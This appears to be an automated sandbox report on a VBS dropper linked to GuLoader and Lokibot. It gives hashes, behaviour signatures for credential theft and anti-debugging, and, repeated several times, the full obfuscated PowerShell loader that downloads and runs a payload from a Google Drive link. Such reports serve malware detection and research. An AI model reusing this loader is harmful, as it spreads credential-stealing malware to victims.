Overview

overview

10

Static

static

1

INVITACIÓ...�A.vbs

windows7-x64

10

INVITACIÓ...�A.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2024 14:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    INVITACIÓN A COTIZAR Nueva cervecería NUEVA CERVECERÍA.vbs

  • Size

    33KB

  • MD5

    281d34b359213e18654c2d24b008dcbd

  • SHA1

    4fb8957b0e96a81ec6582819470c4fdd82bd7170

  • SHA256

    457020a6ebe0fe83e6e4f94addbddb4175f7beb1132658506f8f62dec48309b9

  • SHA512

    6b1df16b37956d6e402e756c319fe9b1212d4c21a0aaf9db738f5363c9891af4d027579bda7252bab304e4eba05cec1cad45c89036fdb7c623593aa1a3e1039d

  • SSDEEP

    384:3mldSVTNn2MTd0LDNsGRsNbs9/FKHgT3ed+2:2qVsMJ0SGCNbkIHgqdD

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderexecutionspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVITACIÓN A COTIZAR Nueva cervecería NUEVA CERVECERÍA.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Laryngeally stringhaltedness eucrasia Tillringers Shirked Proagrarian Fasaners #>;$Logogrif='Bkforeller';<#Forefaldendes Hibernacle Noncapriciously #>;$Barbarizing=$host.PrivateData;If ($Barbarizing) {$Azoic++;}function Dioxinskandale($Politicly){$Kniplende=$Politicly.Length-$Azoic;for( $Rhopalocerous=5;$Rhopalocerous -lt $Kniplende;$Rhopalocerous+=6){$Favorisere+=$Politicly[$Rhopalocerous];}$Favorisere;}function Fiskesnrer($Archegoniate21){ . ($Teamaker) ($Archegoniate21);}$Contuse=Dioxinskandale ' MosaMDeni oKipkaz Disai Membl IschlBonapaconta/Knust5 alae.Bride0.mple S.rew(AcalyWColliiIsomenMesoldMiddeoAgoniwSan.ssDiver PhotoN.oberTBindi Dozer1 endi0Phyt .Unacc0Lommo;Skovf ShagrWTakiniIna,tnM,tat6Furzi4Lidel;Tekst Semilxmi ro6Opfrs4Paddl; dend Oc,onrLi edvBetal:Overt1To el2Bam u1Chane. .ndl0 infl)Fordo L aisG ChifeBan,ecTurrekEkspeoGroun/atypi2 ili0Skoin1Bill,0Miljo0Samme1Inves0 Reno1Blues Ba neFAfholiFirmar UnfoeSke sfDuoloo Dis xSkamf/Sam.e1Crimm2Re ig1 ,ale.Unlet0Hecto ';$Acknowledged47=Dioxinskandale 'C rosu Bom.sDatameDial RSelv,- Ga,ma trdeg ReineE.ectNIndvvTfrab ';$Unguilefully=Dioxinskandale 'flipphAf edt TffetPartipshoots Over: Re i/Group/ HavrdGratirSkinniMidt.vSkaa eS.bta.bretegCutleoS.redoNonecgP,uvrlCon oeUn,ua.Sk.bbcTa gsoPressm redl/UnripuMatercVider?PositeCar oxTuschpSelecoSte orForfltPalus=SkgtodStillo De iwFormanWhigglRichaoFarv.a Con dCoela&,ekstiUnicodwha.m=Cuadr1SnitmiAdva nBo gePSkuffoGevinEidentmJv,frcAn icD OverWT,tan5 roldrUhensn,ypotoStridj Ade 5frag 3SpindFZooprRUnde pFeriey LoraFPa klmEv.rgNGenerKSisl BIn sm3Undou3KassePTek t5Vo,ernBes yAAc en4Kadja ';$Crepis=Dioxinskandale 'Tr cy>.lear ';$Teamaker=Dioxinskandale ' ProdI Pro E SammXrepos ';$Maskinords='Raisine52';$Vaporishness = Dioxinskandale 'InduseB ggec TherhCalcioSrlin Gh fi%Kadrea Sj.fp UnbrpBorted Brisaformatansvaa Flat%Ettys\julenCDis ahErhveeHewera ken pAngi nOplseeProchsM nibsProm e excosYt er.Bus,fuDispenVenerdSk,rs S,urv& Jeri& ibul ArbejeBr kscBrnefhOieinoRastl lisktPanat ';Fiskesnrer (Dioxinskandale ' Lede$sheafg,umfal NikkoRexfob Th aaProdul oto:DistrSTele.tHaetua Kl rmCongla Absek leidtRe,ioiDendroFrog.n he.crKalk,eDihydn ivesLacer=Injur( Procc ethnm Submdabort Uns /Gunstcb shm Haand$AntisVParceaStoddpFortro aryar cantiStyresBoldghGotchn Ke.reSu pesProdus Skad)Nippi ');Fiskesnrer (Dioxinskandale 'Habil$Do smg KatelForenoSammebDrj,eaEdusklMenne: BadeL UnhaiCurlesSpar eUn,uilI deroB anctL eputAmtskeOverfsCider=Antic$ SpndUCurtan br.ggEurocuS jeriFundalA.nekeTidsffKars urefo.lBuffelgrnt.yShort.Aktivspud.vportholpyrogi F lmtUnim (Gudls$Dom eCCircurRiseseUnde,pPomphiBlakks cycl) Arve ');Fiskesnrer (Dioxinskandale 'Uds.i[ FrkoNExorceNonsttC,lgo. SarrSGuauaeS rourPa.apvBorgeiTjr.nc ,nwieGenanPSt,uno dvaliSurnanPharotGangsMGalopa inemn alea TriqgUnstueSter r.loye]Nys a: .spa:Kadi SOpbyge Bil,c mazouTopmarMyrmei Bonuttilfoy ExseP Skurr Un ooModdetCortioSoothcJebleoJom.rlRegne O,pro= germ Uncor[Dr maNSnupteDegu tZooge.Gru dSTheateZannocTalliu RaparNoci.iPr.vitP stayKammePdeplurGi croDelspt S rdoKyllic RangoHerallArbouT Afk,ySulkip euse,omme]Flokk:Forho:SalatTInfirl alvs Houn1Jova,2memen ');$Unguilefully=$Liselottes[0];$Undermenuernes= (Dioxinskandale 'Vari.$TakkeGAstriL GuldOSmaatbSameka DrapLscaup:Spr es ndskYTelefR Sl puMesioPKo,filHomesiNetviK B evepreoc=S ogenAtlaseTek.tw St n-TpshyoSk,lebOversJSissae.stgiCErhvetUt.pi CorrisChoroYTnkebsGathiT SkelE Kn,pm Bnkh.ForklnPr,poeLeucoT T.an. BesnwPoilaeSkamfBR msmC TylolUnbriI ineETo opn VandT');$Undermenuernes+=$Stamaktionrens[1];Fiskesnrer ($Undermenuernes);Fiskesnrer (Dioxinskandale 'Undul$SpoutS,lameyAmphir humauGullip OmvulDiscoidisk k NormeSubco. HoveHh luteCampyaAchrodRoadwePaedor Kimisphysi[Dr eh$ ReduArutebcMoto,kMultin tesoAmtslwru helExculePliendLibergDrac eBustldKnald4Alex 7 Unir]Coffe=Konvo$MalteCCyclooAngrenTiaa tYt.esuPoucys Metae evel ');$Lensbreve160=Dioxinskandale 'Raso,$I dsaS,yromy KonorJornnuSadisp FarvlEfteriBelejkHangdeTands.DustfDWheelo KejswUnpurn G,idl thco rkeaPanthdm morFOpspoi IctelStoneeTrins(Artik$S.renUF rsrnMiavegEnte uEnde,iBa aglWebsteBoghafRe,hou D splAntirlWormlyDobbe,Til a$Sy.yeSRemtruIbrugbMor,njSygemuLytt gXenosaFetaetAfmeleStoppdBonnq)Str,f ';$Subjugated=$Stamaktionrens[0];Fiskesnrer (Dioxinskandale 'Staro$ SlvtgOlufilTurisO ,yreBIroniaTumulL Saks: AwakATeamvlAfholBTilveA .onntEc inr UdreoGyrenSEneheSKompleWohler fmeln stereEquipSAr,ik1recur7Ka ks8Burhn=Funer(SelvaTCarboeTrichSAllevTEneb - unuuPR flea alact Ha ehSpati Baso$TrochS ErodUCh.orb K anjbefinURebufGStiftaCiviltAfveje tunidIn,ur)Kompr ');while (!$Albatrossernes178) {Fiskesnrer (Dioxinskandale ' Sub $NarkogIndhol sureoSch rbSlambaNonstlRegn.:F tomg dplue EntenSt.tinU,majeSammem Borsslivsnp .itdiTr,gllSminklmainle ema=spejl$TagkatA.bejrAstrauDhanveOrgan ') ;Fiskesnrer $Lensbreve160;Fiskesnrer (Dioxinskandale 'shi,nSStnint truaAagerrSnrestClose-RejseSNephrlOsteoeNytnkeExhump Nult Whi 4circu ');Fiskesnrer (Dioxinskandale 'Reani$RaaklgSlimslOzonioEetshbAr usa .hatlRy te:RelatAalbinlAccusbUnabraO erstCutler gyrooKaleis Tj.rsVate.eCoa mrKegbenKisteeHus,osLefth1 ale7Fla i8Sp.ek=Polyp(B.yggTR,poreKlagesstrogt Yded-VinaiP AlunaUdpretsta nhEcosp lunef$InterSIntelunonpob KinejTilbau kremg fgasaedaphtUndiseGru,dd Regr)Reear ') ;Fiskesnrer (Dioxinskandale 'Domin$ K segS,rhelTricioFli tb ScroaServilFlyru:HippuJPriofa kartgDecise Ant sUncar=Unbas$.ngerg rodl I reoObjekbUndvia ncolno sy:StinkKRya,sl RefooStelekSvolvk GigaeUndissVocatt sacar Laare Gla nVillig Af ne Unde+Micr.+G ask%Indla$In hrLPretei UndrsF.reteBe ral AtleoMonomtenlistPellaeVaer,s Syno.,ebricbefudodustcuExclunOpkastArthr ') ;$Unguilefully=$Liselottes[$Jages];}$Mimicry=338077;$galvanisrs=28474;Fiskesnrer (Dioxinskandale 'Hyp a$ RantgAnatol .eceoUd.edbNa uraTipsplB nea:SarcoAHaskanAut ptS upeiLaanenMegafaUnc izPhreniPlenusclinotWhitiiVikt sGravskAcylae pfin unenf= Retr DomicG efleeForlitAnobi-fdrenCSkrifoDeduknColoutRhodieFluohn irevt Anke Sakar$AlkohSBereauAni,abSoljej Ov ruCo tagDeraiaGazelt Kwa,e Vil d cran ');Fiskesnrer (Dioxinskandale 'Bombe$KortfgUpsitlDe isoAsclebSystea Portlschi : IlliBM.ckhe,ciosvvo.iebF.arenFut,re CucunAktiedUsynleVu des,lagt2F avo3 Rave5U pos Bytt =Linea In u[De arSEves ySupersVejl t apuneKlunsmFonds.UdlejC PuzzoConfon eabovUnlene ForsrT,mintinstr] Kolo: Indh: Kr dFsy anrLeveroAmphimPrimeB VoldaNar osNettoeIl ib6Konsp4 ontoSta aetBogtrr SuspiParavnClau.gBrand(palmi$ StorAGoesfnBugentSyenoiSampln P ddaPr.sezSysteiSys esEtnoltUbl giForhasBoykok Med e ypi)Allde ');Fiskesnrer (Dioxinskandale 'Udvin$Nond,g SamflQuod oAmtstb acka BesklSam,e:OscilNbetonomagnenSomerlTro,buPolstcColdsrAtt caMe hit Co piRutylvAhoy eStueanCruise P.rfs V,susKisse Datad=Armou Undvr[ itraSGloveyChands Su etReb ye,opsemInter.ColchT NonheCai uxAvocatTre c.RutscELace n S lvc ostmoTiberdLineaiFeltdnInddeg Fre.]Rytte:Eugle:Absu A clipSGrafsCbagerINagesIRente.Tr.ckGdg fleSpiontO.gonSWheeptBeck r Akk iAutornLakelgDesor(Stylo$.onliB MilieTitanvWandeb PhotnSupereGemulnAsserd HaaneTschesSubli2Bla e3Don r5S gfr)Indgi ');Fiskesnrer (Dioxinskandale 'Langi$Klan gloplulCe leoResocb ,uidaOpposlFurr :PectiIHedwinInstrd SeediVikinvAvendiDun id,dkass Multk ,vinr,flggm MelleSkorpnV ndmeL,ggisWinte=Bogsi$ForebN milloDdmann themlVolvauAfkldcThorirRbestaIn.ert SlgeiAfkobvBrolbemun enBackheIolits ReapsApart.Male sTeartu LixibDead.s NegetH oper Kon i landnDuctigTyver( tors$Aare MPelodi IllumT ldaiBrugec.illirExcreyK.esk,Klvni$Domstg,eksaaYippilRengjv Eng aMonocnBe uriJeblisbr tarGeotrsMisad)Ha.ef ');Fiskesnrer $Individskrmenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cheapnesses.und && echo t"
        3⤵
          PID:2828
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Laryngeally stringhaltedness eucrasia Tillringers Shirked Proagrarian Fasaners #>;$Logogrif='Bkforeller';<#Forefaldendes Hibernacle Noncapriciously #>;$Barbarizing=$host.PrivateData;If ($Barbarizing) {$Azoic++;}function Dioxinskandale($Politicly){$Kniplende=$Politicly.Length-$Azoic;for( $Rhopalocerous=5;$Rhopalocerous -lt $Kniplende;$Rhopalocerous+=6){$Favorisere+=$Politicly[$Rhopalocerous];}$Favorisere;}function Fiskesnrer($Archegoniate21){ . ($Teamaker) ($Archegoniate21);}$Contuse=Dioxinskandale ' MosaMDeni oKipkaz Disai Membl IschlBonapaconta/Knust5 alae.Bride0.mple S.rew(AcalyWColliiIsomenMesoldMiddeoAgoniwSan.ssDiver PhotoN.oberTBindi Dozer1 endi0Phyt .Unacc0Lommo;Skovf ShagrWTakiniIna,tnM,tat6Furzi4Lidel;Tekst Semilxmi ro6Opfrs4Paddl; dend Oc,onrLi edvBetal:Overt1To el2Bam u1Chane. .ndl0 infl)Fordo L aisG ChifeBan,ecTurrekEkspeoGroun/atypi2 ili0Skoin1Bill,0Miljo0Samme1Inves0 Reno1Blues Ba neFAfholiFirmar UnfoeSke sfDuoloo Dis xSkamf/Sam.e1Crimm2Re ig1 ,ale.Unlet0Hecto ';$Acknowledged47=Dioxinskandale 'C rosu Bom.sDatameDial RSelv,- Ga,ma trdeg ReineE.ectNIndvvTfrab ';$Unguilefully=Dioxinskandale 'flipphAf edt TffetPartipshoots Over: Re i/Group/ HavrdGratirSkinniMidt.vSkaa eS.bta.bretegCutleoS.redoNonecgP,uvrlCon oeUn,ua.Sk.bbcTa gsoPressm redl/UnripuMatercVider?PositeCar oxTuschpSelecoSte orForfltPalus=SkgtodStillo De iwFormanWhigglRichaoFarv.a Con dCoela&,ekstiUnicodwha.m=Cuadr1SnitmiAdva nBo gePSkuffoGevinEidentmJv,frcAn icD OverWT,tan5 roldrUhensn,ypotoStridj Ade 5frag 3SpindFZooprRUnde pFeriey LoraFPa klmEv.rgNGenerKSisl BIn sm3Undou3KassePTek t5Vo,ernBes yAAc en4Kadja ';$Crepis=Dioxinskandale 'Tr cy>.lear ';$Teamaker=Dioxinskandale ' ProdI Pro E SammXrepos ';$Maskinords='Raisine52';$Vaporishness = Dioxinskandale 'InduseB ggec TherhCalcioSrlin Gh fi%Kadrea Sj.fp UnbrpBorted Brisaformatansvaa Flat%Ettys\julenCDis ahErhveeHewera ken pAngi nOplseeProchsM nibsProm e excosYt er.Bus,fuDispenVenerdSk,rs S,urv& Jeri& ibul ArbejeBr kscBrnefhOieinoRastl lisktPanat ';Fiskesnrer (Dioxinskandale ' Lede$sheafg,umfal NikkoRexfob Th aaProdul oto:DistrSTele.tHaetua Kl rmCongla Absek leidtRe,ioiDendroFrog.n he.crKalk,eDihydn ivesLacer=Injur( Procc ethnm Submdabort Uns /Gunstcb shm Haand$AntisVParceaStoddpFortro aryar cantiStyresBoldghGotchn Ke.reSu pesProdus Skad)Nippi ');Fiskesnrer (Dioxinskandale 'Habil$Do smg KatelForenoSammebDrj,eaEdusklMenne: BadeL UnhaiCurlesSpar eUn,uilI deroB anctL eputAmtskeOverfsCider=Antic$ SpndUCurtan br.ggEurocuS jeriFundalA.nekeTidsffKars urefo.lBuffelgrnt.yShort.Aktivspud.vportholpyrogi F lmtUnim (Gudls$Dom eCCircurRiseseUnde,pPomphiBlakks cycl) Arve ');Fiskesnrer (Dioxinskandale 'Uds.i[ FrkoNExorceNonsttC,lgo. SarrSGuauaeS rourPa.apvBorgeiTjr.nc ,nwieGenanPSt,uno dvaliSurnanPharotGangsMGalopa inemn alea TriqgUnstueSter r.loye]Nys a: .spa:Kadi SOpbyge Bil,c mazouTopmarMyrmei Bonuttilfoy ExseP Skurr Un ooModdetCortioSoothcJebleoJom.rlRegne O,pro= germ Uncor[Dr maNSnupteDegu tZooge.Gru dSTheateZannocTalliu RaparNoci.iPr.vitP stayKammePdeplurGi croDelspt S rdoKyllic RangoHerallArbouT Afk,ySulkip euse,omme]Flokk:Forho:SalatTInfirl alvs Houn1Jova,2memen ');$Unguilefully=$Liselottes[0];$Undermenuernes= (Dioxinskandale 'Vari.$TakkeGAstriL GuldOSmaatbSameka DrapLscaup:Spr es ndskYTelefR Sl puMesioPKo,filHomesiNetviK B evepreoc=S ogenAtlaseTek.tw St n-TpshyoSk,lebOversJSissae.stgiCErhvetUt.pi CorrisChoroYTnkebsGathiT SkelE Kn,pm Bnkh.ForklnPr,poeLeucoT T.an. BesnwPoilaeSkamfBR msmC TylolUnbriI ineETo opn VandT');$Undermenuernes+=$Stamaktionrens[1];Fiskesnrer ($Undermenuernes);Fiskesnrer (Dioxinskandale 'Undul$SpoutS,lameyAmphir humauGullip OmvulDiscoidisk k NormeSubco. HoveHh luteCampyaAchrodRoadwePaedor Kimisphysi[Dr eh$ ReduArutebcMoto,kMultin tesoAmtslwru helExculePliendLibergDrac eBustldKnald4Alex 7 Unir]Coffe=Konvo$MalteCCyclooAngrenTiaa tYt.esuPoucys Metae evel ');$Lensbreve160=Dioxinskandale 'Raso,$I dsaS,yromy KonorJornnuSadisp FarvlEfteriBelejkHangdeTands.DustfDWheelo KejswUnpurn G,idl thco rkeaPanthdm morFOpspoi IctelStoneeTrins(Artik$S.renUF rsrnMiavegEnte uEnde,iBa aglWebsteBoghafRe,hou D splAntirlWormlyDobbe,Til a$Sy.yeSRemtruIbrugbMor,njSygemuLytt gXenosaFetaetAfmeleStoppdBonnq)Str,f ';$Subjugated=$Stamaktionrens[0];Fiskesnrer (Dioxinskandale 'Staro$ SlvtgOlufilTurisO ,yreBIroniaTumulL Saks: AwakATeamvlAfholBTilveA .onntEc inr UdreoGyrenSEneheSKompleWohler fmeln stereEquipSAr,ik1recur7Ka ks8Burhn=Funer(SelvaTCarboeTrichSAllevTEneb - unuuPR flea alact Ha ehSpati Baso$TrochS ErodUCh.orb K anjbefinURebufGStiftaCiviltAfveje tunidIn,ur)Kompr ');while (!$Albatrossernes178) {Fiskesnrer (Dioxinskandale ' Sub $NarkogIndhol sureoSch rbSlambaNonstlRegn.:F tomg dplue EntenSt.tinU,majeSammem Borsslivsnp .itdiTr,gllSminklmainle ema=spejl$TagkatA.bejrAstrauDhanveOrgan ') ;Fiskesnrer $Lensbreve160;Fiskesnrer (Dioxinskandale 'shi,nSStnint truaAagerrSnrestClose-RejseSNephrlOsteoeNytnkeExhump Nult Whi 4circu ');Fiskesnrer (Dioxinskandale 'Reani$RaaklgSlimslOzonioEetshbAr usa .hatlRy te:RelatAalbinlAccusbUnabraO erstCutler gyrooKaleis Tj.rsVate.eCoa mrKegbenKisteeHus,osLefth1 ale7Fla i8Sp.ek=Polyp(B.yggTR,poreKlagesstrogt Yded-VinaiP AlunaUdpretsta nhEcosp lunef$InterSIntelunonpob KinejTilbau kremg fgasaedaphtUndiseGru,dd Regr)Reear ') ;Fiskesnrer (Dioxinskandale 'Domin$ K segS,rhelTricioFli tb ScroaServilFlyru:HippuJPriofa kartgDecise Ant sUncar=Unbas$.ngerg rodl I reoObjekbUndvia ncolno sy:StinkKRya,sl RefooStelekSvolvk GigaeUndissVocatt sacar Laare Gla nVillig Af ne Unde+Micr.+G ask%Indla$In hrLPretei UndrsF.reteBe ral AtleoMonomtenlistPellaeVaer,s Syno.,ebricbefudodustcuExclunOpkastArthr ') ;$Unguilefully=$Liselottes[$Jages];}$Mimicry=338077;$galvanisrs=28474;Fiskesnrer (Dioxinskandale 'Hyp a$ RantgAnatol .eceoUd.edbNa uraTipsplB nea:SarcoAHaskanAut ptS upeiLaanenMegafaUnc izPhreniPlenusclinotWhitiiVikt sGravskAcylae pfin unenf= Retr DomicG efleeForlitAnobi-fdrenCSkrifoDeduknColoutRhodieFluohn irevt Anke Sakar$AlkohSBereauAni,abSoljej Ov ruCo tagDeraiaGazelt Kwa,e Vil d cran ');Fiskesnrer (Dioxinskandale 'Bombe$KortfgUpsitlDe isoAsclebSystea Portlschi : IlliBM.ckhe,ciosvvo.iebF.arenFut,re CucunAktiedUsynleVu des,lagt2F avo3 Rave5U pos Bytt =Linea In u[De arSEves ySupersVejl t apuneKlunsmFonds.UdlejC PuzzoConfon eabovUnlene ForsrT,mintinstr] Kolo: Indh: Kr dFsy anrLeveroAmphimPrimeB VoldaNar osNettoeIl ib6Konsp4 ontoSta aetBogtrr SuspiParavnClau.gBrand(palmi$ StorAGoesfnBugentSyenoiSampln P ddaPr.sezSysteiSys esEtnoltUbl giForhasBoykok Med e ypi)Allde ');Fiskesnrer (Dioxinskandale 'Udvin$Nond,g SamflQuod oAmtstb acka BesklSam,e:OscilNbetonomagnenSomerlTro,buPolstcColdsrAtt caMe hit Co piRutylvAhoy eStueanCruise P.rfs V,susKisse Datad=Armou Undvr[ itraSGloveyChands Su etReb ye,opsemInter.ColchT NonheCai uxAvocatTre c.RutscELace n S lvc ostmoTiberdLineaiFeltdnInddeg Fre.]Rytte:Eugle:Absu A clipSGrafsCbagerINagesIRente.Tr.ckGdg fleSpiontO.gonSWheeptBeck r Akk iAutornLakelgDesor(Stylo$.onliB MilieTitanvWandeb PhotnSupereGemulnAsserd HaaneTschesSubli2Bla e3Don r5S gfr)Indgi ');Fiskesnrer (Dioxinskandale 'Langi$Klan gloplulCe leoResocb ,uidaOpposlFurr :PectiIHedwinInstrd SeediVikinvAvendiDun id,dkass Multk ,vinr,flggm MelleSkorpnV ndmeL,ggisWinte=Bogsi$ForebN milloDdmann themlVolvauAfkldcThorirRbestaIn.ert SlgeiAfkobvBrolbemun enBackheIolits ReapsApart.Male sTeartu LixibDead.s NegetH oper Kon i landnDuctigTyver( tors$Aare MPelodi IllumT ldaiBrugec.illirExcreyK.esk,Klvni$Domstg,eksaaYippilRengjv Eng aMonocnBe uriJeblisbr tarGeotrsMisad)Ha.ef ');Fiskesnrer $Individskrmenes;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2608
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Laryngeally stringhaltedness eucrasia Tillringers Shirked Proagrarian Fasaners #>;$Logogrif='Bkforeller';<#Forefaldendes Hibernacle Noncapriciously #>;$Barbarizing=$host.PrivateData;If ($Barbarizing) {$Azoic++;}function Dioxinskandale($Politicly){$Kniplende=$Politicly.Length-$Azoic;for( $Rhopalocerous=5;$Rhopalocerous -lt $Kniplende;$Rhopalocerous+=6){$Favorisere+=$Politicly[$Rhopalocerous];}$Favorisere;}function Fiskesnrer($Archegoniate21){ . ($Teamaker) ($Archegoniate21);}$Contuse=Dioxinskandale ' MosaMDeni oKipkaz Disai Membl IschlBonapaconta/Knust5 alae.Bride0.mple S.rew(AcalyWColliiIsomenMesoldMiddeoAgoniwSan.ssDiver PhotoN.oberTBindi Dozer1 endi0Phyt .Unacc0Lommo;Skovf ShagrWTakiniIna,tnM,tat6Furzi4Lidel;Tekst Semilxmi ro6Opfrs4Paddl; dend Oc,onrLi edvBetal:Overt1To el2Bam u1Chane. .ndl0 infl)Fordo L aisG ChifeBan,ecTurrekEkspeoGroun/atypi2 ili0Skoin1Bill,0Miljo0Samme1Inves0 Reno1Blues Ba neFAfholiFirmar UnfoeSke sfDuoloo Dis xSkamf/Sam.e1Crimm2Re ig1 ,ale.Unlet0Hecto ';$Acknowledged47=Dioxinskandale 'C rosu Bom.sDatameDial RSelv,- Ga,ma trdeg ReineE.ectNIndvvTfrab ';$Unguilefully=Dioxinskandale 'flipphAf edt TffetPartipshoots Over: Re i/Group/ HavrdGratirSkinniMidt.vSkaa eS.bta.bretegCutleoS.redoNonecgP,uvrlCon oeUn,ua.Sk.bbcTa gsoPressm redl/UnripuMatercVider?PositeCar oxTuschpSelecoSte orForfltPalus=SkgtodStillo De iwFormanWhigglRichaoFarv.a Con dCoela&,ekstiUnicodwha.m=Cuadr1SnitmiAdva nBo gePSkuffoGevinEidentmJv,frcAn icD OverWT,tan5 roldrUhensn,ypotoStridj Ade 5frag 3SpindFZooprRUnde pFeriey LoraFPa klmEv.rgNGenerKSisl BIn sm3Undou3KassePTek t5Vo,ernBes yAAc en4Kadja ';$Crepis=Dioxinskandale 'Tr cy>.lear ';$Teamaker=Dioxinskandale ' ProdI Pro E SammXrepos ';$Maskinords='Raisine52';$Vaporishness = Dioxinskandale 'InduseB ggec TherhCalcioSrlin Gh fi%Kadrea Sj.fp UnbrpBorted Brisaformatansvaa Flat%Ettys\julenCDis ahErhveeHewera ken pAngi nOplseeProchsM nibsProm e excosYt er.Bus,fuDispenVenerdSk,rs S,urv& Jeri& ibul ArbejeBr kscBrnefhOieinoRastl lisktPanat ';Fiskesnrer (Dioxinskandale ' Lede$sheafg,umfal NikkoRexfob Th aaProdul oto:DistrSTele.tHaetua Kl rmCongla Absek leidtRe,ioiDendroFrog.n he.crKalk,eDihydn ivesLacer=Injur( Procc ethnm Submdabort Uns /Gunstcb shm Haand$AntisVParceaStoddpFortro aryar cantiStyresBoldghGotchn Ke.reSu pesProdus Skad)Nippi ');Fiskesnrer (Dioxinskandale 'Habil$Do smg KatelForenoSammebDrj,eaEdusklMenne: BadeL UnhaiCurlesSpar eUn,uilI deroB anctL eputAmtskeOverfsCider=Antic$ SpndUCurtan br.ggEurocuS jeriFundalA.nekeTidsffKars urefo.lBuffelgrnt.yShort.Aktivspud.vportholpyrogi F lmtUnim (Gudls$Dom eCCircurRiseseUnde,pPomphiBlakks cycl) Arve ');Fiskesnrer (Dioxinskandale 'Uds.i[ FrkoNExorceNonsttC,lgo. SarrSGuauaeS rourPa.apvBorgeiTjr.nc ,nwieGenanPSt,uno dvaliSurnanPharotGangsMGalopa inemn alea TriqgUnstueSter r.loye]Nys a: .spa:Kadi SOpbyge Bil,c mazouTopmarMyrmei Bonuttilfoy ExseP Skurr Un ooModdetCortioSoothcJebleoJom.rlRegne O,pro= germ Uncor[Dr maNSnupteDegu tZooge.Gru dSTheateZannocTalliu RaparNoci.iPr.vitP stayKammePdeplurGi croDelspt S rdoKyllic RangoHerallArbouT Afk,ySulkip euse,omme]Flokk:Forho:SalatTInfirl alvs Houn1Jova,2memen ');$Unguilefully=$Liselottes[0];$Undermenuernes= (Dioxinskandale 'Vari.$TakkeGAstriL GuldOSmaatbSameka DrapLscaup:Spr es ndskYTelefR Sl puMesioPKo,filHomesiNetviK B evepreoc=S ogenAtlaseTek.tw St n-TpshyoSk,lebOversJSissae.stgiCErhvetUt.pi CorrisChoroYTnkebsGathiT SkelE Kn,pm Bnkh.ForklnPr,poeLeucoT T.an. BesnwPoilaeSkamfBR msmC TylolUnbriI ineETo opn VandT');$Undermenuernes+=$Stamaktionrens[1];Fiskesnrer ($Undermenuernes);Fiskesnrer (Dioxinskandale 'Undul$SpoutS,lameyAmphir humauGullip OmvulDiscoidisk k NormeSubco. HoveHh luteCampyaAchrodRoadwePaedor Kimisphysi[Dr eh$ ReduArutebcMoto,kMultin tesoAmtslwru helExculePliendLibergDrac eBustldKnald4Alex 7 Unir]Coffe=Konvo$MalteCCyclooAngrenTiaa tYt.esuPoucys Metae evel ');$Lensbreve160=Dioxinskandale 'Raso,$I dsaS,yromy KonorJornnuSadisp FarvlEfteriBelejkHangdeTands.DustfDWheelo KejswUnpurn G,idl thco rkeaPanthdm morFOpspoi IctelStoneeTrins(Artik$S.renUF rsrnMiavegEnte uEnde,iBa aglWebsteBoghafRe,hou D splAntirlWormlyDobbe,Til a$Sy.yeSRemtruIbrugbMor,njSygemuLytt gXenosaFetaetAfmeleStoppdBonnq)Str,f ';$Subjugated=$Stamaktionrens[0];Fiskesnrer (Dioxinskandale 'Staro$ SlvtgOlufilTurisO ,yreBIroniaTumulL Saks: AwakATeamvlAfholBTilveA .onntEc inr UdreoGyrenSEneheSKompleWohler fmeln stereEquipSAr,ik1recur7Ka ks8Burhn=Funer(SelvaTCarboeTrichSAllevTEneb - unuuPR flea alact Ha ehSpati Baso$TrochS ErodUCh.orb K anjbefinURebufGStiftaCiviltAfveje tunidIn,ur)Kompr ');while (!$Albatrossernes178) {Fiskesnrer (Dioxinskandale ' Sub $NarkogIndhol sureoSch rbSlambaNonstlRegn.:F tomg dplue EntenSt.tinU,majeSammem Borsslivsnp .itdiTr,gllSminklmainle ema=spejl$TagkatA.bejrAstrauDhanveOrgan ') ;Fiskesnrer $Lensbreve160;Fiskesnrer (Dioxinskandale 'shi,nSStnint 